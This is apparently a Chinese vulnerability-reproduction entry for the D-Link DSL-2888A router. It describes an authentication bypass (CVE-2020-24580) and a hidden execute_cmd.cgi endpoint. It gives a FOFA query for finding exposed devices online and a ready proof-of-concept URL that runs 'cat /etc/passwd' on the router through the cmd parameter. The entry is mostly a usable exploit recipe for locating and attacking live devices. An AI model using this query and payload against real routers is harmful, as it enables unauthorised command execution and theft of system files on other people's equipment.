漏洞描述
D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。 在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。
漏洞影响
D-Link DSL-2888A
FOFA #
body="DSL-2888A"
漏洞复现
登录页面输入任意密码建立连接
当输入错误密码时链接会跳到http://IP/page/login/login.html?error=fail
修改为poc即可远程执行命令
http://IP/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=cat%20/etc/passwd